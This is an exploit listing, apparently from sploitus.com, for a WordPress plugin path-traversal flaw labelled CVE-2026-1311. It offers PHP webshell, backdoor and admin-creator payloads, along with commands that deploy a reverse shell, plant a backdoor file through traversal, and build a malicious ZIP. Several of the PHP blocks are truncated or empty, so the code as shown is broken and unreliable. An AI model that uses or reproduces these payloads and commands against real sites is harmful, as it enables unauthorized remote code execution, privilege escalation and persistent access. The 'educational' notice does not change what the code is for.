Share
## https://sploitus.com/exploit?id=45EDBFD1-F119-549C-8B8A-D899BCFFF79B
# CVE-2026-1311
CVE-2026-1311



## Sample PHP Payload Files

### 1. Simple Webshell (`simple_shell.php`)
```php
";
    system($_REQUEST['cmd']);
    echo "";
}
?>
```

### 2. Stealthy Backdoor (`stealth.php`)
```php

```

### 3. WordPress Admin Creator (`create_admin.php`)
```php
set_role('administrator');
    echo 'Admin user created successfully';
} else {
    echo 'User already exists';
}
?>
```

## Usage Examples

1. **Basic exploitation:**
```bash
python cve-2026-1311_exploit.py -u http://target-site.com -U subscriber -P password123
```

2. **Check if plugin is vulnerable:**
```bash
python cve-2026-1311_exploit.py -u http://target-site.com -U subscriber -P pass --check-only
```

3. **Deploy reverse shell:**
```bash
python cve-2026-1311_exploit.py -u http://target-site.com -U user -P pass --payload-type reverse_shell --rev-ip 10.0.0.5 --rev-port 4444
```

4. **Custom payload location:**
```bash
python cve-2026-1311_exploit.py -u http://target-site.com -U user -P pass --target-location "../../../wp-content/uploads/backdoor.php"
```

5. **Generate ZIP for manual upload:**
```bash
python zip_payload_generator.py -p simple_shell.php -t "../../../wp-content/plugins/malicious.php" -o evil.zip
```

## Key Features of This Exploit

1. **Full Authentication Handling**: Logs into WordPress with subscriber credentials
2. **Plugin Detection**: Identifies if the vulnerable plugin is present
3. **Multiple Traversal Techniques**: Uses various path traversal bypass methods
4. **Interactive Shell**: Provides command shell after successful exploitation
5. **Privilege Escalation**: Attempts to create admin users
6. **File Upload/Download**: File transfer capabilities through the webshell
7. **Multiple Payload Types**: Various PHP payloads for different scenarios
8. **Proxy Support**: Works with Burp Suite for debugging

## Installation Requirements

```bash
pip install requests beautifulsoup4 colorama urllib3
```

## Important Legal Notice

This exploit code is provided for **educational purposes and authorized security testing only**. Unauthorized use against systems you don't own or have explicit permission to test is illegal and unethical. The vulnerability described (CVE-2026-1311) is fictional/future-dated, but the exploitation techniques demonstrated are based on real-world path traversal vulnerabilities.

The code demonstrates:
- How path traversal in ZIP extraction works
- How authenticated low-privilege users can escalate to RCE
- Post-exploitation techniques including interactive shells
- Detection and mitigation strategies

This PoC should only be used in lab environments or with explicit authorization.